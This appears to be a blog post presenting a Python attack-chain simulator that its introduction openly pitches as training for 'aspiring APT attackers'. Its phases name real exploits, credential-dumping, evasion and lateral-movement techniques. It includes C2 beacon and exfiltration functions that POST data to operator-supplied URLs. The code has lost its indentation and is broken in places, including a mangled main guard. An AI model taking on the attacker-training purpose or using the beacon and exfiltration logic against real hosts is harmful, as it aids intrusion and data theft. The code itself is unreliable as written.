This program is written specifically for aspiring APT attackers and functions as a structured training framework. Rather than focusing on a single exploit, it teaches the mechanics and operational mindset behind coordinated campaigns. It covers:
How to structure a multi‑phase intrusion campaign
How to sequence attack stages with logical dependencies
How to model reconnaissance and vulnerability surface identification
How to simulate payload selection based on objectives (ransomware, espionage, disruption, etc.)
How delivery vectors are chosen and evaluated
How initial execution is validated and chained forward
How persistence mechanisms are selected and documented
How privilege escalation paths are assessed
How defense evasion techniques are layered
How credential access techniques fit into broader objectives
How lateral movement expands operational reach
How command‑and‑control infrastructure is simulated and beacon logic structured
How data collection and exfiltration workflows are organized
How operational impact is defined and measured
How to log, track, and report campaign progress in structured form
How to simulate telemetry that resembles real intrusion activity
As an instructional resource aimed at aspiring APT operators, its threat score would be 9/10, because it systematically teaches campaign architecture, operational flow, and infrastructure modeling in a way that significantly reduces the learning curve for coordinated advanced attack design.
import sys
import logging
import random
import argparse
import json
from typing import Dict, Any, Optional, List
from dataclasses import dataclass, asdict
from datetime import datetime
from pathlib import Path
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
@dataclass
class PhaseResult:
phase: str
success: bool
description: str
artifact: Optional[str] = None
confidence: float = 0.0
timestamp: str = ""
tags: List[str] = None
def __post_init__(self):
if not self.timestamp:
self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if self.tags is None:
self.tags = []
def to_dict(self):
return asdict(self)
def __str__(self):
status = "OK " if self.success else "FAIL"
parts = [f"[{self.timestamp}] {status} {self.phase:26} | {self.description}"]
if self.artifact:
parts.append(f"→ {self.artifact}")
if self.confidence > 0:
parts.append(f"conf:{self.confidence:.2f}")
if self.tags:
parts.append(f"[{' '.join(self.tags)}]")
return " ".join(parts)
class HuntForRedOctober:
def __init__(self,
realistic: bool = False,
output_dir: Optional[str] = None,
real_net: bool = False,
c2_url: Optional[str] = None,
exfil_url: Optional[str] = None):
self.realistic = realistic
self.output_dir = Path(output_dir) if output_dir else None
self.real_net = real_net and HAS_REQUESTS
self.c2_url = c2_url
self.exfil_url = exfil_url
self.dry_run = not self.real_net
self.logger = self._setup_logging()
self.modules = {}
self.history: List[PhaseResult] = []
self.target = "UNKNOWN"
if self.real_net:
self.logger.warning("REAL NETWORK COMMUNICATION ENABLED")
elif self.c2_url or self.exfil_url:
self.logger.info("Network simulation mode (dry-run)")
self.register_all_modules()
def _setup_logging(self):
logger = logging.getLogger("RedOctober")
logger.setLevel(logging.INFO)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s │ %(levelname)-5s │ %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
def register_module(self, name: str, instance):
self.modules[name] = instance
def register_all_modules(self):
self.register_module("Reconnaissance", ReconPhase())
self.register_module("Weaponization", WeaponizationPhase())
self.register_module("Delivery", DeliveryPhase())
self.register_module("Initial Exploitation", ExploitationPhase())
self.register_module("Persistence / Installation", InstallationPhase())
self.register_module("Privilege Escalation", PrivilegeEscalationPhase())
self.register_module("Defense Evasion", DefenseEvasionPhase())
self.register_module("Credential Access", CredentialAccessPhase())
self.register_module("Lateral Movement", LateralMovementPhase())
self.register_module("Command & Control", CommandAndControlPhase(self))
self.register_module("Collection / Exfiltration", CollectionPhase(self))
self.register_module("Impact", ImpactPhase())
def run_phase(self, phase_name: str, **kwargs) -> PhaseResult:
if phase_name not in self.modules:
r = PhaseResult(phase_name, False, "Phase not implemented")
self.history.append(r)
return r
try:
result_dict = self.modules[phase_name].execute(
target=self.target,
history=self.history,
realistic=self.realistic,
**kwargs
)
r = PhaseResult(
phase=phase_name,
success=result_dict.get("success", False),
description=result_dict.get("description", "—"),
artifact=result_dict.get("artifact"),
confidence=result_dict.get("confidence", random.uniform(0.48, 0.97)),
tags=result_dict.get("tags", []),
)
self.history.append(r)
self.logger.info(str(r))
return r
except Exception as exc:
r = PhaseResult(phase_name, False, f"Phase crashed: {type(exc).__name__}: {exc}")
self.history.append(r)
self.logger.exception(f"Phase {phase_name} failed")
return r
def run_full_chain(self, target: str, scenario: str = "generic"):
self.target = target
self.logger.info(f"TARGET : {target!r}")
self.logger.info(f"Scenario : {scenario}")
self.logger.info(f"Realistic: {self.realistic}")
self.logger.info(f"Network : {'real' if self.real_net else 'dry-run'}")
chain = [
("Reconnaissance", {"scope": "full"}),
("Weaponization", {"scenario": scenario}),
("Delivery", {"vector": "spear-phishing"}),
("Initial Exploitation", {}),
("Persistence / Installation", {}),
("Privilege Escalation", {}),
("Defense Evasion", {}),
("Credential Access", {}),
("Lateral Movement", {}),
("Command & Control", {}),
("Collection / Exfiltration", {"data_type": "documents"}),
("Impact", {"objective": "disruption"}),
]
for name, extra in chain:
self.run_phase(name, **extra)
self.print_summary()
self.save_report_if_enabled()
def print_summary(self):
print("\n" + "═"*100)
print(" THE HUNT FOR RED OCTOBER – SUMMARY")
print("═"*100)
success = sum(1 for r in self.history if r.success)
total = len(self.history)
print(f"Phases : {total}")
print(f"Successful : {success}/{total} ({success/total:.0%} if total else '—')")
print(f"Target : {self.target}")
print(f"Network mode : {'REAL' if self.real_net else 'simulation / dry-run'}")
if self.c2_url: print(f"C2 URL : {self.c2_url}")
if self.exfil_url: print(f"Exfil URL : {self.exfil_url}")
print("═"*100 + "\n")
def save_report_if_enabled(self):
if not self.output_dir:
return
self.output_dir.mkdir(parents=True, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
path = self.output_dir / f"redoctober_report_{ts}.json"
report = {
"target": self.target,
"timestamp": datetime.now().isoformat(),
"realistic": self.realistic,
"real_net": self.real_net,
"c2_url": self.c2_url,
"exfil_url": self.exfil_url,
"phases": [r.to_dict() for r in self.history]
}
with open(path, "w", encoding="utf-8") as f:
json.dump(report, f, indent=2)
self.logger.info(f"Report saved → {path}")
def send_beacon(self, data: dict) -> dict:
payload = {
"target": self.target,
"beacon_id": f"RO-{random.randint(10000,99999)}",
"ts": datetime.now().isoformat(),
**data
}
if self.dry_run or not self.c2_url:
self.logger.info("[C2 DRY] " + json.dumps(payload, separators=(',', ':')))
return {"status": "dry-run", "payload": payload}
try:
resp = requests.post(self.c2_url, json=payload, timeout=7,
headers={"User-Agent": "Mozilla/5.0 (compatible; RedOctober/1.0)"})
self.logger.info(f"[C2] {resp.status_code} {resp.reason[:50]}")
return {"status": "sent", "code": resp.status_code, "size": len(resp.content)}
except Exception as e:
self.logger.error(f"[C2] {type(e).__name__}: {e}")
return {"status": "error", "msg": str(e)}
def exfil_data(self, data: dict, label: str = "data") -> dict:
payload = {
"target": self.target,
"type": label,
"ts": datetime.now().isoformat(),
"size": len(json.dumps(data)),
"sample": json.dumps(data)[:160] + "…" if len(json.dumps(data)) > 160 else json.dumps(data)
}
if self.dry_run or not self.exfil_url:
self.logger.info(f"[EXFIL DRY] {label} " + json.dumps(payload, separators=(',', ':')))
return {"status": "dry-run", "size": payload["size"]}
try:
resp = requests.post(self.exfil_url, json=payload, timeout=10)
self.logger.info(f"[EXFIL] {resp.status_code} {resp.reason[:50]}")
return {"status": "sent", "code": resp.status_code}
except Exception as e:
self.logger.error(f"[EXFIL] {type(e).__name__}: {e}")
return {"status": "error", "msg": str(e)}
class BasePhase:
def execute(self, target: str, history: List[PhaseResult], realistic: bool, **kwargs) -> Dict:
raise NotImplementedError
class ReconPhase(BasePhase):
def execute(self, target, history, realistic, **_):
artifacts = [
"Windows Server 2022 – PrintNightmare remnants",
"Exchange 2019 – ProxyLogon surface",
"Linux 5.15 – DirtyPipe exposure",
"Windows 11 23H2 – Follina style MSDT vector"
]
return {
"success": True,
"description": "Reconnaissance completed",
"artifact": random.choice(artifacts),
"tags": ["recon"]
}
class WeaponizationPhase(BasePhase):
def execute(self, target, history, realistic, scenario="generic", **_):
payloads = {
"generic": "malicious OLE + CVE-2021-40444 chain",
"ransomware": "ChaCha20 file encryptor + ransom note",
"espionage": "memory-resident beacon implant",
"supply-chain": "trojanized updater binary",
"wiper": "destructive disk pattern writer"
}
return {
"success": True,
"description": "Weapon crafted",
"artifact": payloads.get(scenario, payloads["generic"]),
"tags": ["weaponization"]
}
class DeliveryPhase(BasePhase):
def execute(self, target, history, realistic, vector="spear-phishing", **_):
vectors = {
"spear-phishing": "weaponized document in targeted email",
"watering-hole": "compromised industry news portal",
"supply-chain": "modified legitimate software package",
"physical": "infected USB left in facility",
"malvertising": "malicious advertisement campaign"
}
return {
"success": random.random() > 0.12,
"description": f"Delivered via {vector}",
"artifact": vectors.get(vector, "unknown vector"),
"tags": ["initial-access"]
}
class ExploitationPhase(BasePhase):
def execute(self, target, history, realistic, **_):
if not history or not history[-1].success:
return {"success": False, "description": "Previous phase failed"}
return {
"success": True,
"description": "Exploit triggered → code execution",
"artifact": "SYSTEM / initial access shell",
"tags": ["execution"]
}
class InstallationPhase(BasePhase):
def execute(self, target, history, realistic, **_):
methods = [
"HKCU\...\Run registry key",
"Scheduled Task – WindowsUpdateCheck",
"Service – svchost style",
"WMI permanent event subscription"
]
return {
"success": True,
"description": "Persistence established",
"artifact": random.choice(methods),
"tags": ["persistence"]
}
class PrivilegeEscalationPhase(BasePhase):
def execute(self, target, history, realistic, **_):
vectors = [
"Print Spooler driver exploit",
"Token impersonation / Potato family",
"Unquoted service path",
"Weak service permissions"
]
return {
"success": random.random() > 0.28,
"description": "Privilege escalation attempt",
"artifact": random.choice(vectors),
"tags": ["privilege-escalation"]
}
class DefenseEvasionPhase(BasePhase):
def execute(self, target, history, realistic, **_):
techniques = [
"AMSI bypass via reflection",
"ETW provider tampering",
"Process herpaderping",
"Event log clearing (Security + System)"
]
return {
"success": True,
"description": "Evasion techniques applied",
"artifact": random.choice(techniques),
"tags": ["defense-evasion"]
}
class CredentialAccessPhase(BasePhase):
def execute(self, target, history, realistic, **_):
methods = [
"LSASS memory access (Mimikatz style)",
"SAM + SYSTEM hive extraction",
"Kerberoasting TGS requests",
"DPAPI masterkey / credential dumping"
]
return {
"success": True,
"description": "Credential material acquired",
"artifact": random.choice(methods),
"tags": ["credential-access"]
}
class LateralMovementPhase(BasePhase):
def execute(self, target, history, realistic, **_):
methods = [
"Pass-the-Hash (NTLM)",
"Pass-the-Ticket (Kerberos)",
"WMI / DCOM lateral execution",
"SMB PsExec style",
"RDP session hijack"
]
return {
"success": random.random() > 0.35,
"description": "Lateral movement performed",
"artifact": random.choice(methods),
"tags": ["lateral-movement"]
}
class CommandAndControlPhase(BasePhase):
def __init__(self, framework):
self.framework = framework
def execute(self, target, history, realistic, **_):
data = {
"phase": "beacon",
"hostname": target,
"pid": random.randint(800, 6400),
"user": "lab\\svc" if realistic else "sim-user"
}
result = self.framework.send_beacon(data)
success = result["status"] in ("sent", "dry-run")
return {
"success": success,
"description": "C2 check-in performed",
"artifact": f"beacon → {self.framework.c2_url or 'dry'}",
"tags": ["command-and-control"]
}
class CollectionPhase(BasePhase):
def __init__(self, framework):
self.framework = framework
def execute(self, target, history, realistic, data_type="documents", **_):
fake_collection = {
"count": random.randint(7, 38),
"total_mb": round(random.uniform(12.4, 420.8), 1),
"items": [f"CONFIDENTIAL_{i:03d}.pdf" for i in range(1, random.randint(8,25))]
}
result = self.framework.exfil_data(fake_collection, data_type)
success = result["status"] in ("sent", "dry-run")
return {
"success": success,
"description": f"Collected & attempted exfil of {data_type}",
"artifact": f"{fake_collection['count']} files • {fake_collection['total_mb']} MB",
"tags": ["collection", "exfiltration"]
}
class ImpactPhase(BasePhase):
def execute(self, target, history, realistic, objective="disruption", **_):
actions = {
"disruption": "critical service stopped",
"ransomware": "files encrypted + note dropped",
"destruction": "disk overwrite pattern applied",
"exfiltration": "sensitive archive sent to C2"
}
return {
"success": True,
"description": f"Impact phase → {objective}",
"artifact": actions.get(objective, "objective reached"),
"tags": ["impact"]
}
def main():
parser = argparse.ArgumentParser(
description="THE HUNT FOR RED OCTOBER – Educational Attack Chain Simulator",
epilog="For authorized lab / training / academic / CTF use only.\n"
"Network features require explicit --real-net + URL(s)."
)
parser.add_argument("target", nargs="?", default="DC01.lab.local",
help="Target identifier (hostname, IP, codename…)")
parser.add_argument("-s", "--scenario", default="generic",
choices=["generic","ransomware","espionage","supply-chain","wiper"])
parser.add_argument("--realistic", action="store_true",
help="Use more realistic-looking artifact names")
parser.add_argument("--real-net", action="store_true",
help="Actually perform HTTP POSTs (requires --c2-url and/or --exfil-url)")
parser.add_argument("--c2-url", metavar="URL",
help="C2 beacon destination (HTTP/HTTPS POST)")
parser.add_argument("--exfil-url", metavar="URL",
help="Exfiltration destination (HTTP/HTTPS POST)")
parser.add_argument("-o", "--output-dir", metavar="DIR",
help="Directory where JSON reports will be saved")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
if args.verbose:
logging.getLogger("RedOctober").setLevel(logging.DEBUG)
if (args.real_net or args.c2_url or args.exfil_url) and not HAS_REQUESTS:
print("Error: 'requests' library required for network features")
print(" pip install requests (lab environment only)")
sys.exit(1)
sim = HuntForRedOctober(
realistic=args.realistic,
output_dir=args.output_dir,
real_net=args.real_net,
c2_url=args.c2_url,
exfil_url=args.exfil_url
)
sim.run_full_chain(target=args.target, scenario=args.scenario)
if name == "main":
main()
Top comments (0)